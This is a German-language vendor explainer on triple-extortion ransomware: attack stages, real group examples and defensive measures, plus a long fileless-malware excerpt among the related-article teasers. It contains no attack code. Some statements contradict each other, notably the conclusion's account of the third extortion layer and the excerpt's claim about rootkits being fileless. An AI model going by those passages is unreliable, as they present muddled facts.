Header Navigation - DE
Background image for Was ist dreifache Erpressung durch Ransomware?
Cybersecurity 101/Intelligente Bedrohung/Dreifache Erpressung

Was ist dreifache Erpressung durch Ransomware?

Triple Extortion erweitert die Bedrohung durch Ransomware um weitere Ebenen. Verstehen Sie, wie diese Taktik funktioniert und wie Sie sich effektiv dagegen verteidigen können.

Autor: SentinelOne

Triple Extortion ist eine fortgeschrittene Taktik von Ransomware-Angreifern, bei der Daten nicht nur verschlüsselt, sondern auch mit ihrer Veröffentlichung und der Erpressung Dritter gedroht wird. In diesem Leitfaden wird erläutert, wie Triple Extortion funktioniert und welche Auswirkungen sie auf Unternehmen hat.

Erfahren Sie mehr über wirksame Präventionsstrategien und die Bedeutung der Planung von Maßnahmen zur Reaktion auf Vorfälle. Das Verständnis der dreifachen Erpressung ist für Unternehmen von entscheidender Bedeutung, um ihre sensiblen Informationen zu schützen.

Angriffe mit dreifacher Erpressung verstärken die finanziellen und betrieblichen Risiken für die betroffenen Unternehmen. Über die unmittelbare Lösegeldforderung und die Folgen einer Datenverletzung hinaus , fügt die Gefahr eines DDoS-Angriffs eine neue Dimension der Dringlichkeit und des Drucks hinzu, die die Opfer dazu zwingt, die Zahlung des Lösegelds in Betracht zu ziehen, um weiteren Schaden zu vermeiden.

Ein kurzer Überblick über dreifache Erpressung

Die dreifache Erpressung stellt eine Weiterentwicklung im Bereich der Cyber-Bedrohungen dar und erhöht den Einsatz und die Komplexität von Ransomware-Angriffen erheblich. Das Konzept der dreifachen Erpressung tauchte erstmals um das Jahr 2020 auf, als Cyberkriminelle nach neuen Wegen suchten, um ihren Einfluss und ihre Gewinne zu maximieren. Zusätzlich zur Verschlüsselung der Daten des Opfers und dem Diebstahl sensibler Informationen, wie bei der doppelten Erpressung, Bedrohungsakteure eine dritte Ebene eingeführt: die Drohung, einen DDoS-Angriff auf die Infrastruktur des Opfers zu starten. Durch die Drohung, die Online-Dienste eines Unternehmens zu stören und unbrauchbar zu machen, wollen Cyberkriminelle maximalen Druck auf ihre Opfer ausüben, damit diese ihre Lösegeldforderungen erfüllen.

In der heutigen Cybersicherheitslandschaft sind dreifache Erpressungsangriffe immer häufiger anzutreffen. Unternehmen jeder Größe, von kleinen Betrieben bis hin zu großen Konzernen, und aus verschiedenen Branchen sind bereits Opfer dieser vielschichtigen Angriffe geworden. Die potenziellen Folgen eines DDoS-Angriffs können den Ruf eines Unternehmens finanziell ruinieren, was die dreifache Erpressung zu einer wirkungsvollen Strategie für Cyberkriminelle macht.

Die Bedeutung der dreifachen Erpressung liegt in ihrer Fähigkeit, mehrere Zwangsmittel einzusetzen. Sie zwingt die Opfer in ein qualvolles Dilemma: Entweder sie zahlen das Lösegeld, um eine Offenlegung ihrer Daten, finanzielle Verluste und mögliche DDoS-bedingte Betriebsunterbrechungen zu vermeiden, oder sich zu weigern und alle diese Konsequenzen gleichzeitig zu riskieren. Diese dreifache Bedrohung unterstreicht die Dringlichkeit für Unternehmen, ihre Cybersicherheitsmaßnahmen zu verstärken, ihre Fähigkeiten zur Reaktion auf Vorfälle zu verbessern und in Bedrohungsinformationen zu investieren, um diese vielschichtigen Angriffe effektiv zu erkennen und abzuwehren.

Da Cyberkriminelle ihre Taktiken ständig weiterentwickeln und anpassen, macht die dreifache Erpressung deutlich, wie sehr sich Cyberbedrohungen ständig weiterentwickeln. Um diese Bedrohung einzudämmen, ist ein ganzheitlicher Ansatz erforderlich, der Ransomware, Datenschutz und DDoS-Abwehr umfasst und die Notwendigkeit proaktiver Cybersicherheitsmaßnahmen zum Schutz sensibler Informationen und zur Gewährleistung der Geschäftskontinuität in einer zunehmend gefährlichen digitalen Landschaft betont.

So funktioniert dreifache Erpressung

Aus technischer Sicht umfasst diese ausgeklügelte Taktik einen dreistufigen Ansatz, wobei jede Stufe die Gesamtnötigung und den potenziellen Schaden für das Opfer verstärkt:

Erster Zugriff und Aufklärung

Angreifer verschaffen sich zunächst auf verschiedene Weise Zugang zum Zielnetzwerk, beispielsweise durch Phishing-E-Mails, Ausnutzen von Software-Schwachstellen oder Verwendung gestohlener Anmeldedaten. Sobald sie sich im Netzwerk befinden, führen sie eine Erkundung durch, um wertvolle Ressourcen, Systeme und Datenspeicher im Netzwerk des Opfers zu identifizieren. In dieser Phase wird die Architektur des Netzwerks kartiert, werden die Sicherheitsmaßnahmen verstanden und werden hochwertige Ziele lokalisiert.

Datenexfiltration

In der zweiten Phase identifizieren und exfiltrieren Angreifer sensible Daten aus dem kompromittierten Netzwerk. Zu diesen Daten können Kundendaten, Finanzinformationen, geistiges Eigentum oder vertrauliche Dokumente gehören. Angreifer wenden fortschrittliche Techniken zur Datenexfiltration an, um eine Entdeckung zu vermeiden, beispielsweise Datenkomprimierung, Verschlüsselung oder Verschleierung. Sie können legitime Tools und Protokolle verwenden, um die gestohlenen Daten heimlich zu verschieben.

Datenverschlüsselung

Nach erfolgreicher Datenexfiltration leiten die Angreifer die Ransomware-Phase ein. Sie verwenden starke Verschlüsselungsalgorithmen wie AES-256, um wichtige Dateien und Systeme im Netzwerk des Opfers zu verschlüsseln. Der Verschlüsselungsprozess ist in der Regel asymmetrisch, wobei die Angreifer den privaten Entschlüsselungscode besitzen. Dieser Code ist notwendig, um die verschlüsselten Dateien zu entsperren, und nur die Angreifer verfügen darüber.

Lösegeldforderung und Zahlungsaufforderung

Die Angreifer übermitteln dem Opfer eine Lösegeldforderung, häufig in Form einer Textdatei oder eines Bildes, das auf den kompromittierten Systemen angezeigt wird. Diese Nachricht enthält detaillierte Anweisungen zur Zahlung des Lösegeldes, einschließlich der zu verwendenden Kryptowährung und der Wallet-Adresse. Den Opfern wird eine bestimmte Frist gesetzt, um der Lösegeldforderung nachzukommen, die in der Regel in Kryptowährungen wie Bitcoin oder Monero bezahlt wird, um die Anonymität zu wahren.

Doppelte Erpressungsbenachrichtigung

Im Falle eines dreifachen Erpressungsangriffs teilen die Angreifer dem Opfer neben der traditionellen Lösegeldforderung mit, dass sie sensible Daten erfolgreich exfiltriert haben. Diese Benachrichtigung ist entscheidend, um zusätzlichen Druck auf das Opfer auszuüben. Die Angreifer können Beweise für den Datendiebstahl vorlegen, z. B. Dateilisten oder Ausschnitte, um ihre Behauptungen zu untermauern und die Folgen einer Nichtbefolgung zu betonen.

Drohungen mit Datenveröffentlichung

Die Angreifer drohen damit, die gestohlenen Daten im Internet oder in Untergrundforen öffentlich zu veröffentlichen, wenn das Lösegeld nicht innerhalb der angegebenen Frist gezahlt wird. Diese Drohung ist besonders wirkungsvoll, da sie für das Opfer rechtliche Konsequenzen, Bußgelder und Reputationsschäden nach sich ziehen kann.

Zahlungsüberprüfung und Kommunikation

Opfer, die sich zur Zahlung des Lösegelds entschließen, müssen die bereitgestellten Anweisungen befolgen, darunter die Überweisung der Kryptowährung an eine eindeutige Bitcoin-Wallet-Adresse. Die Angreifer überprüfen die Zahlung in der Blockchain und kommunizieren mit dem Opfer über verschlüsselte Kanäle, um sicherzustellen, dass die Zahlung erfolgreich ist und der Entschlüsselungsprozess fortgesetzt werden kann.

Lieferung des Entschlüsselungscodes

Sobald die Lösegeldzahlung überprüft wurde, liefern die Angreifer den Entschlüsselungscode oder das Entschlüsselungstool an das Opfer. Dieser Schlüssel ist für die Entschlüsselung der Dateien und Systeme, die während der Ransomware-Phase verschlüsselt wurden, unerlässlich.

Dreifache Erpressungsangriffe sind äußerst komplex und technisch ausgefeilt und nutzen die Gefahr der Offenlegung von Daten, um den Druck auf die Opfer zu maximieren. Das Verständnis der technischen Feinheiten der dreifachen Erpressung ist für Cybersicherheitsexperten und -organisationen von entscheidender Bedeutung, um robuste Abwehrmaßnahmen und Reaktionsstrategien in einer sich ständig weiterentwickelnden Bedrohungslandschaft zu entwickeln.

Verbessern Sie Ihre Threat Intelligence

Erfahren Sie, wie der SentinelOne-Service WatchTower zur Bedrohungssuche mehr Erkenntnisse liefert und Ihnen hilft, Angriffe abzuwehren.

Mehr erfahren

Anwendungsfälle von dreifacher Erpressung

Die dreifache Erpressung ist eine bedrohliche Entwicklung im Bereich der Cyberangriffe, die die Folgen und die Komplexität von Ransomware-Angriffen erheblich verstärkt. Hier sind einige Anwendungsfälle der dreifachen Erpressung aus der Praxis, ihre Bedeutung und die Maßnahmen, die Unternehmen ergreifen, um sich gegen diese eskalierenden Risiken zu schützen.

Die Conti-Ransomware-Gruppe

Conti ist eine bekannte Ransomware-as-a-Service (RaaS)-Organisation, die für ihre dreifachen Erpressungstaktiken bekannt ist. Sie verschlüsseln Daten, stehlen sensible Informationen und drohen mit deren Veröffentlichung, wenn das Lösegeld nicht gezahlt wird.

  • Bedeutung – Der Ansatz von Conti unterstreicht das Risiko von Reputationsschäden und regulatorischen Konsequenzen. Dieses Angriffsmodell zwingt Unternehmen dazu, nicht nur die Datenwiederherstellung, sondern auch die potenzielle öffentliche Bekanntgabe sensibler Daten zu berücksichtigen.
  • Sicherheitsmaßnahmen – Unternehmen, die von Conti ins Visier genommen werden, investieren in robuste E-Mail-Sicherheitslösungen, Benutzerschulungen, fortschrittliche Bedrohungserkennung und Incident-Response-Fähigkeiten, um die Auswirkungen von dreifachen Erpressungsversuchen zu minimieren.

Der DarkSide-Ransomware-Angriff

DarkSide sorgte für Schlagzeilen, nachdem es Colonial Pipeline, einen großen US-amerikanischen Betreiber von Kraftstoffpipelines, ins Visier genommen hatte. Die Gruppe verschlüsselte Daten und entwendete sensible Betriebsinformationen, was zu Unterbrechungen der Kraftstoffversorgung führte.

  • Bedeutung – Dieser Angriff deckte Schwachstellen in kritischen Infrastrukturen auf und zeigte, dass Ransomware-Angriffe weitreichende Folgen haben und wichtige Dienste sowie die nationale Sicherheit beeinträchtigen können.
  • Sicherheitsmaßnahmen – Anbieter kritischer Infrastrukturen und Unternehmen mit lebenswichtigen Diensten verbessern ihre Cybersicherheit durch die Einführung von Netzwerksegmentierung, Zero-Trust-Architekturen und den Austausch von Bedrohungsinformationen ein, um sich vor dreifachen Erpressungsdrohungen zu schützen.

Die Avaddon-Ransomware-Kampagne

Avaddon Die Betreiber nahmen Organisationen aus verschiedenen Branchen ins Visier, verschlüsselten Daten und entwendeten sensible Informationen wie Kundendaten und geistiges Eigentum.

  • Bedeutung – Angriffe wie die von Avaddon unterstreichen die Notwendigkeit für Unternehmen, dem Schutz von Kundendaten und geistigem Eigentum Priorität einzuräumen. Die Exfiltration birgt sowohl finanzielle Verluste als auch den Verlust von Wettbewerbsvorteilen.
  • Sicherheitsmaßnahmen – Unternehmen konzentrieren sich auf Verschlüsselung, Datenverlustprävention und Extended Detection and Response (XDR)-Lösungen, um Datenexfiltration während dreifacher Erpressungsangriffe zu erkennen und darauf zu reagieren.

Die REvil-Ransomware-Gruppe

REvil hat eine dreifache Erpressungstaktik angewendet, indem sie Daten verschlüsselt, sensible Informationen exfiltriert und mit deren Veröffentlichung gedroht hat. Sie hat eine Vielzahl von Branchen ins Visier genommen, darunter Anwaltskanzleien und Kanzleien, die Prominente vertreten.

  • Bedeutung – Der Angriff auf Anwaltskanzleien macht deutlich, dass kein Sektor vor dreifacher Erpressung gefeit ist. Die Angreifer nutzen die Vertraulichkeit der juristischen Arbeit aus und legen sensible Kundendaten zu Erpressungszwecken offen.
  • Sicherheitsmaßnahmen – Anwaltskanzleien und Organisationen, die mit sensiblen Informationen umgehen, stärken ihre Cybersicherheit durch die Einführung von End-to-End-Verschlüsselung, sicheren Kommunikationsplattformen für Mandanten und strengen Zugriffskontrollen, um unbefugte Datenexfiltration zu verhindern.

Cl0p-Ransomware-Gruppe

Cl0p ist dafür bekannt, Bildungseinrichtungen anzugreifen, Daten zu verschlüsseln und sensible Forschungs- und personenbezogene Daten zu stehlen.

  • Bedeutung – Angriffe auf Bildungseinrichtungen veranschaulichen die große Bandbreite der Ziele von dreifacher Erpressung. In diesem Fall ist der potenzielle Verlust wertvoller Forschungsdaten und personenbezogene Daten (PII) ist ein großes Problem.
  • Sicherheitsmaßnahmen – Bildungseinrichtungen verbessern ihre Cybersicherheitsmaßnahmen durch fortschrittliche Bedrohungserkennung, Netzwerksegmentierung und Datenverschlüsselung, um wertvolle Forschungsdaten und sensible Studentendaten vor Angriffen im Stil von Cl0p zu schützen.

Um sich gegen die Risiken einer dreifachen Erpressung zu schützen, verfolgen Unternehmen mehrere proaktive Strategien:

  • Datenverschlüsselung – Die Verschlüsselung sensibler Daten sowohl im Ruhezustand als auch während der Übertragung schützt vor unbefugtem Zugriff, selbst wenn Daten abgezogen werden.
  • Mehrschichtige Sicherheit – Die Implementierung mehrerer Sicherheitsebenen, darunter E-Mail-Filterung, Endpunktschutz und Netzwerküberwachung, verbessert die Fähigkeit, Angriffe zu erkennen und zu verhindern.
  • Benutzerschulungen – Die Schulung Die Schulung der Mitarbeiter zu bewährten Verfahren im Bereich Cybersicherheit, einschließlich der Erkennung von Phishing-Versuchen und Social-Engineering-Taktiken, ist entscheidend für die Reduzierung des menschlichen Faktors bei Angriffen.
  • Verhinderung von Datenverlusten (DLP) – DLP Lösungen helfen dabei, Versuche der Datenexfiltration zu erkennen und zu verhindern, indem sie Unternehmen auf potenzielle Sicherheitsverletzungen aufmerksam machen.
  • Planung der Reaktion auf Vorfälle – Die Entwicklung klar definierter Reaktionspläne für Vorfälle sorgt dafür, dass Unternehmen schnell und effektiv auf dreifache Erpressungsangriffe reagieren können.
  • Austausch von Bedrohungsinformationen – Die Zusammenarbeit mit Branchenkollegen und der Austausch von Bedrohungsinformationen helfen Unternehmen, über neue Bedrohungen und Angriffstechniken auf dem Laufenden zu bleiben.

Fazit

Die dreifache Erpressung, eine Weiterentwicklung von Ransomware-Angriffen, stellt globale Unternehmen vor eine gewaltige Herausforderung. Zusätzlich zur Verschlüsselung von Daten und der Androhung ihrer Vernichtung fügen Cyberkriminelle nun eine dritte Ebene der Bedrohung hinzu: die Erpressung sensibler Informationen, verbunden mit der Androhung ihrer Veröffentlichung. Diese dreifache Bedrohung zwingt die Opfer effektiv zur Zahlung von Lösegeld, da sie nicht nur den Verlust ihrer Daten, sondern auch den Schaden für ihren Ruf und regulatorische Konsequenzen befürchten.

Um dreifache Erpressung wirksam zu bekämpfen, müssen Einzelpersonen und Organisationen ihre Abwehrmaßnahmen durch strenge Sicherheitsprotokolle, regelmäßige Datensicherungen, Mitarbeiterschulungen und kontinuierliche Bedrohungsinformationen verstärken. Diese proaktive Haltung ist unerlässlich, um sich ständig weiterentwickelnde Cyber-Bedrohungen abzuwehren.

"

Häufig gestellte Fragen zu dreifacher Erpressung

Triple-Extortion-Ransomware ist ein dreistufiger Angriff, bei dem Kriminelle Ihre Daten verschlüsseln, stehlen und eine dritte Bedrohung wie DDoS-Angriffe oder direkte Angriffe auf Ihre Kunden hinzufügen. Sie begnügen sich nicht mehr nur mit der Verschlüsselung von Dateien. Die Angreifer drohen damit, Ihre gestohlenen Daten zu veröffentlichen, und üben dann zusätzlichen Druck aus, indem sie Ihre Geschäftspartner ins Visier nehmen oder Sie mit Dienstunterbrechungen schädigen.

REvil, AvosLocker und BlackCat sind große Ransomware-Gruppen, die Dreifach-Erpressungstaktiken anwenden. Der Angriff auf die finnische Klinik Vastaamo im Jahr 2020 war der erste dokumentierte Fall – die Angreifer forderten Lösegeld von der Klinik und gingen dann gegen einzelne Patienten mit geringeren Zahlungen vor.

Dies lässt sich auch bei Gruppen wie Hive und Quantum beobachten, die Daten verschlüsseln, mit Veröffentlichungen drohen und gleichzeitig DDoS-Angriffe starten.

Angreifer verschaffen sich zunächst über Phishing-E-Mails oder gestohlene Zugangsdaten Zugang zu Ihrem Netzwerk und stehlen dann Ihre Daten, bevor sie diese verschlüsseln. Nachdem sie Ihre Dateien gesperrt haben, stellen sie die erste Lösegeldforderung. Wenn Sie nicht zahlen, drohen sie damit, Ihre Daten online zu veröffentlichen.

Dann kommt die dritte Stufe – sie könnten Ihre Website mit DDoS angreifen, Ihre Kunden anrufen oder Zahlungen von Ihren Geschäftspartnern verlangen.

Dreifache Erpressung setzt Sie unter viel größeren Druck, da Backups nicht alle Ihre Probleme lösen. Selbst wenn Sie Ihre Dateien wiederherstellen, verfügen die Erpresser weiterhin über Ihre gestohlenen Daten und können Ihren Ruf schädigen. Die dritte Ebene verschlimmert die Situation noch, indem sie Ihre Kunden und Partner ins Visier nimmt, sodass Sie es mit mehreren Bedrohungen gleichzeitig zu tun haben. Das macht es viel schwieriger, die Lösegeldforderung einfach zu ignorieren.

Gesundheitsorganisationen, Behörden und Unternehmen mit wertvollen Kundendaten sind die Hauptziele. Wenn Sie über sensible Informationen verfügen, die Menschen oder Ihre Geschäftsbeziehungen schädigen könnten, sind Sie gefährdet. Auch kleine Unternehmen sind nicht sicher – Angreifer haben es auf jeden abgesehen, von dem sie glauben, dass er zahlen könnte.

Jede Organisation, die mit wertvollen Kunden oder Partnern in Verbindung steht, wird zu einem potenziellen Ziel für diese erweiterten Angriffe.

Ja, dreifache Erpressung macht herkömmliche Backups weniger effektiv, da die Bedrohung über verschlüsselte Dateien hinausgeht. Sie können Ihre Daten zwar aus Backups wiederherstellen, aber die Angreifer verfügen weiterhin über Kopien Ihrer sensiblen Informationen. Sie können weiterhin damit drohen, diese zu veröffentlichen, Ihre Website anzugreifen oder Ihre Kunden zu verfolgen, selbst wenn Sie Ihre Dateien wiederherstellen. Dies zwingt Sie dazu, über die reine Datenwiederherstellung hinauszudenken.

Verwenden Sie Multi-Faktor-Authentifizierung, halten Sie Ihre Systeme auf dem neuesten Stand und schulen Sie Ihre Mitarbeiter darin, Phishing-E-Mails zu erkennen. Richten Sie regelmäßige Backups ein und speichern Sie diese an sicheren, offline verfügbaren Orten, auf die Angreifer keinen Zugriff haben. Setzen Sie Firewalls mit Sicherheitsdiensten ein und überwachen Sie Ihr Netzwerk auf ungewöhnliche Aktivitäten. Stellen Sie sicher, dass Sie über einen soliden Plan zur Reaktion auf Vorfälle verfügen, der mehrere Angriffsvektoren abdeckt.

Unternehmen benötigen mehrschichtige Sicherheitsmaßnahmen, die über den reinen Schutz von Daten hinausgehen. Nutzen Sie cloudbasierten DDoS-Schutz, um die Verfügbarkeit Ihrer Dienste während Angriffen aufrechtzuerhalten. Implementieren Sie Tools zur Erkennung und Reaktion auf Endpunkte, die laterale Bewegungen frühzeitig erkennen können.

Sie sollten außerdem Verträge mit Ihren Lieferanten und Partnern abschließen, in denen Sicherheitsanforderungen und Verfahren zur Reaktion auf Vorfälle festgelegt sind. Vergessen Sie nicht, Ihre Abwehrmaßnahmen regelmäßig zu testen.

Erfahren Sie mehr über Intelligente Bedrohung

Was ist ein Honeypot? Definition, Arten und VerwendungszweckeIntelligente Bedrohung

Was ist ein Honeypot? Definition, Arten und Verwendungszwecke

Entdecken Sie in diesem umfassenden Leitfaden, was ein Honeypot ist. Erfahren Sie mehr über seine Arten, Vorteile und Einsatztechniken. Entdecken Sie Beispiele aus der Praxis, Herausforderungen und Tipps für die Honeypot-Sicherheit in Unternehmen.

Mehr lesen
Was ist ein AitM-Angriff (Adversary-in-the-Middle)?Intelligente Bedrohung

Was ist ein AitM-Angriff (Adversary-in-the-Middle)?

Adversary-in-the-Middle-Angriffe (AiTM) manipulieren die Kommunikation für böswillige Zwecke. Machen Sie sich mit deren Taktiken vertraut und lernen Sie, wie Sie sich dagegen schützen können.

Mehr lesen
Was ist ein Bedrohungsakteur? Arten und BeispieleIntelligente Bedrohung

Was ist ein Bedrohungsakteur? Arten und Beispiele

Das Verständnis der Bedrohungsakteure ist für eine wirksame Verteidigung von entscheidender Bedeutung. Informieren Sie sich über die Motive und Taktiken verschiedener Cyber-Gegner.

Mehr lesen
Was ist dateilose Malware? Wie kann man sie erkennen und verhindern?Intelligente Bedrohung

Was ist dateilose Malware? Wie kann man sie erkennen und verhindern?

Dateilose Malware funktioniert ohne herkömmliche Dateien, wodurch sie schwer zu erkennen ist. In diesem Leitfaden wird erläutert, wie dateilose Malware funktioniert, wie sie Infektionen verursacht und welche Risiken sie für Unternehmen birgt. Erfahren Sie mehr über wirksame Erkennungs- und Präventionsstrategien zur Bekämpfung dieser heimlichen Bedrohung. Das Verständnis von dateiloser Malware ist für die Verbesserung der Cybersicherheit von entscheidender Bedeutung. Der SentinelOne H1 2018 Enterprise Risk Index Report zeigt, dass dateilose Angriffe zwischen Januar und Juni um 94 % zugenommen haben. PowerShell-Angriffe stiegen von 2,5 Angriffen pro 1.000 Endpunkten im Mai 2018 auf 5,2 Angriffe pro 1.000 Endpunkten im Juni. In den letzten Jahren haben sich Angreifer zunehmend fileless Malware als hochwirksame Alternative zugewandt. Was ist dateilose Malware? Dateilose Malware ist bösartiger Code, der keine ausführbare Datei im Dateisystem des Endgeräts benötigt, außer denen, die bereits vorhanden sind. Sie wird in der Regel in einen laufenden Prozess eingeschleust und nur im RAM ausgeführt. Dies macht es für herkömmliche Antivirensoftware und andere Endpunkt-Sicherheitsprodukte-Produkte, da sie nur wenig Speicherplatz beansprucht und keine Dateien zum Scannen vorhanden sind. Ein Beispiel , das die USA, Kanada und Europa betraf, starteten Angreifer eine Spam-Kampagne, bei der sie bösartige Word-Dokumente versendeten, die beim Öffnen Makros ausführten und dabei dateilose Malware verbreiteten. In Fällen wie diesem bezieht sich "dateilos" darauf, dass Angreifer Windows PowerShell nutzen, um eine ausführbare Datei direkt in den Speicher zu laden, anstatt sie auf die Festplatte zu schreiben (wo sie von durchschnittlichen Malware-Scannern erkannt werden kann). Es gibt viele andere Möglichkeiten, Code auf einem Gerät auszuführen, ohne ausführbare Dateien zu verwenden. Diese nutzen oft Systemprozesse, die vom Betriebssystem zur Verfügung gestellt werden und als vertrauenswürdig gelten. Einige Beispiele hierfür sind: VBScript JScript Batch-Dateien PowerShell Windows Management Instrumentation (WMI) Mshta und rundll32 (oder andere von Windows signierte Dateien, die schädlichen Code ausführen können) In Dokumenten versteckte Malware ist ebenfalls eine dateilose Attacke Neben dem dateilosen Angriff, bei dem Systemdateien zum Ausführen von Schadcode verwendet werden, gibt es eine weitere häufige und als dateilos geltende Angriffsart: in Dokumenten versteckte Malware. Obwohl solche Datendateien keinen Code ausführen dürfen, gibt es Schwachstellen in Microsoft Office und PDF-Readern, die Angreifer ausnutzen können, um die Ausführung von Code zu erreichen. Beispielsweise könnte ein infiziertes Dokument einen bösartigen PowerShell -Befehl auslösen. Es gibt auch einige integrierte Funktionen, die die Ausführung von Code innerhalb von Dokumenten ermöglichen, wie z. B. Makros und DDE-Angriff. Wie funktioniert dateilose Malware? Die häufigste Form von dateiloser Malware in freier Wildbahn tritt auf, wenn ein Opfer auf einen Spam-Link in einer E-Mail oder auf einer betrügerischen Website klickt. Dieser Link oder diese Website lädt dann die Flash-Anwendung und implementiert einen entsprechenden Exploit, um den Computer des Benutzers zu infizieren. Anschließend verwendet die Malware Shellcode, um einen Befehl auszuführen, mit dem sie die Nutzlast ausschließlich im Speicher herunterladen und ausführen kann. Das bedeutet, dass es keine Spuren ihrer Aktivität gibt. Je nach den Zielen des Hackers kann die Malware sensible Daten kompromittieren, den Computer des Opfers beschädigen oder andere schädliche Aktionen wie Datendiebstahl und Verschlüsselung durchführen. Hacker geben sich in der Regel als vertrauenswürdige oder bekannte Quelle aus, um das Opfer davon zu überzeugen, auf den von ihnen bereitgestellten Link zu klicken. Dies ist besonders effektiv in formellen Umgebungen, in denen das Opfer glaubt, dass ein Mitarbeiter oder eine Führungskraft seines Unternehmens Kontakt mit ihm aufnimmt. Die wichtigste Erkenntnis hierbei ist, dass diese Art von Malware-Angriffen auf Social Engineering angewiesen ist, um erfolgreich zu sein. Merkmale von dateiloser Malware Diese Art von Schadsoftware nutzt Programme, die sich bereits auf dem Computer befinden. Ihr Verhalten kann von heuristischen Scannern nicht erkannt werden, und sie hat keinen identifizierbaren Code oder Signatur. Darüber hinaus befindet sich dateilose Malware im Speicher des Systems. Um zu funktionieren, nutzt sie die Prozesse des infizierten Betriebssystems aus. Fortgeschrittenere dateilose Malware kann auch mit anderen Arten von Malware kombiniert werden, um komplexe Cyberangriffe zu ermöglichen. Unter den richtigen Umständen kann sie sogar Whitelisting und Sandboxing umgehen. Phasen eines fileless Malware-Angriffs Ein fileless Malware-Angriff ist in seiner Funktionsweise ziemlich einzigartig. Das Verständnis seiner Funktionsweise kann einem Unternehmen helfen, sich in Zukunft vor fileless Malware-Angriffen zu schützen. Lassen Sie uns untersuchen, was Sie wissen sollten. 1. Malware verschafft sich Zugriff auf den Computer Bevor ein Angreifer seinen Malware-Angriff vollständig ausführen kann, muss er sich zunächst Zugriff auf den Computer des Opfers verschaffen, häufig mithilfe einer Phishing oder Social-Engineering-Taktik. Danach kann er mit den weiteren Schritten des Prozesses beginnen. Eine weitere Möglichkeit, sich Zugang zum Computer des Opfers zu verschaffen, ist der Diebstahl von Anmeldedaten. Durch den Diebstahl von Anmeldedaten erhält der Hacker freien Zugang zum System und kann diese Informationen dann nutzen, um auf andere Umgebungen zuzugreifen. Der erste Zugriff auf den Computer verschafft dem Hacker beispielsweise möglicherweise nicht die erforderlichen Berechtigungen, aber er kann sich die Anmeldedaten beschaffen, um an diese Daten zu gelangen. 2. Das Programm etabliert Persistenz Nach dem Zugriff richtet die Malware eine Hintertür ein, über die der Hacker nach Belieben auf den Computer zugreifen kann. Der Hauptzweck dieser Maßnahme besteht darin, den Zugriff auf das Gerät nicht zu verlieren, damit die Informationsbeschaffung über einen langen Zeitraum fortgesetzt werden kann. 3. Datenexfiltration Die letzte Phase ist die Datenexfiltration. Nachdem der Angreifer die benötigten Informationen gefunden hat, werden die Daten in eine andere Umgebung exfiltriert. Auf diese Weise können sie über einen langen Zeitraum hinweg unbemerkt sensible Daten beschaffen und so oft wie nötig wiederholt vorgehen. Gängige Techniken fileless Malware fundiertes verständnis der verschiedenen techniken hilft ihnen dabei, angriffe in zukunft zu erkennen. hier sind sechs arten von malware, die dateilose funktionen nutzen können, um fähigkeit zur umgehung erkennung verbessern: 1. Speicherresidente Malware Durch die Nutzung des Speicherplatzes einer echten Windows-Datei können Angreifer bösartigen Code laden, der so lange inaktiv bleibt, bis er aktiviert wird. Der dateilose Aspekt besteht darin, dass herkömmliche Antivirensoftware, die Dateien scannt, die Malware nicht erkennen kann. 2. Rootkits Da Rootkits nicht in einer Datei, sondern im Kernel existieren, verfügen sie über leistungsstarke Fähigkeiten, um einer Erkennung zu entgehen. Sie sind zu 100 % dateilos, fallen aber aufgrund ihrer Weiterentwicklung in diese Kategorie. 3. Windows-Registrierungs-Malware Wie im oben genannten Beispiel nutzen diese Angriffe die Windows-Registrierungsdatenbank, in der Low-Level-Einstellungen für verschiedene Anwendungen gespeichert sind. Die Malware basiert auf Code, der über eine Datei ausgeführt wird, aber diese Datei ist so eingestellt, dass sie sich nach der Ausführung selbst zerstört, sodass die Malware als dateilos bestehen bleibt. 4. Falsche Anmeldedaten Wie der Name schon sagt, beinhaltet dieser Angriff die Verwendung kompromittierter Anmeldedaten eines legitimen Benutzers (d. h. gestohlene Benutzernamen und Passwörter). Nachdem der Hacker Zugriff auf das System erlangt hat, implementiert er einen Shellcode, um seinen Angriff auf den Rechner zu erleichtern. In extremen Fällen kann er sogar Code in der Registrierungsdatenbank platzieren, um sich dauerhaften Zugriff auf den Computer zu verschaffen. 5. Dateilose Ransomware Für diejenigen, die mit dieser Art von Malware nicht vertraut sind: Ransomware ist ein Schadprogramm, das Hacker einsetzen, um Geld von ihren Opfern zu erpressen. Oft verschlüsseln sie sensible Daten und drohen, diese zu löschen, wenn nicht eine bestimmte Summe Geld gezahlt wird, häufig in Form von Kryptowährung. Bei dieser Art von dateilosen Angriffen können Hacker angreifen, ohne jemals etwas auf die Festplatte des Computers zu schreiben. Das macht es schwierig, den Angriff zu erkennen, bis es zu spät ist. 6. Exploit-Kits Angreifer nutzen eine Sammlung von Tools, sogenannte Exploit-Kits, um Schwachstellen auf dem Computer des Opfers auszunutzen. Diese Angriffe beginnen in der Regel wie ein typischer dateiloser Malware-Angriff, d. h., sie verleiten den Benutzer oft dazu, auf einen betrügerischen Link zu klicken. Sobald das Programm in den Computer eingedrungen ist, kann das Exploit-Kit das System scannen, um Schwachstellen zu ermitteln, die ausgenutzt werden können, und dann eine Reihe spezifischer Exploits zum Einsatz bringen. Oftmals bleibt die Malware unentdeckt und verschafft sich umfassenden Zugriff auf das System und die Daten. Das Problem für Unternehmen Einer der Gründe, warum dateilose Malware so attraktiv ist, besteht darin, dass Sicherheitsprodukte die Systemdateien oder Software, die bei dieser Art von Angriffen verwendet werden, nicht einfach blockieren können. Wenn beispielsweise ein Sicherheitsadministrator PowerShell blockieren würde, hätte dies negative Auswirkungen auf die IT-Wartung. Das Gleiche gilt für das Blockieren von Office-Dokumenten oder Office-Makros, was wahrscheinlich noch größere Auswirkungen auf die Geschäftskontinuität hätte. Der geringere Speicherbedarf und das Fehlen "fremder" ausführbarer Dateien, die gescannt werden könnten, machen es für herkömmliche Antivirenprogramme und andere Endpoint-Sicherheitsprodukte schwierig, diese Art von Angriffen zu erkennen oder zu verhindern. Das Problem für Anbieter Unternehmen sind sich bewusst, dass das Fehlen eines wirksamen Schutzes vor dateiloser Malware ihre Organisation extrem anfällig machen könnte. Infolgedessen gerieten Sicherheitsanbieter unter Druck, dieser wachsenden Bedrohung zu begegnen, und entwickelten alle möglichen Patches, um ihre "Datei-losen Angriffe" abzudecken (oder zu demonstrieren). Leider sind viele dieser Versuche, das Problem zu lösen, nicht ideal. Hier sind einige der Standardlösungen und warum sie unzureichend sind: Blockieren von PowerShell Wie oben erwähnt, ist PowerShell zu einem unverzichtbaren Werkzeug für IT-Teams geworden und hat das alte cmd-Tool von Microsoft als Standard-Befehlszeilenprogramm weitgehend ersetzt. Eine Blockierung würde zu erheblichen Störungen für IT-Teams führen. Noch wichtiger ist jedoch, dass 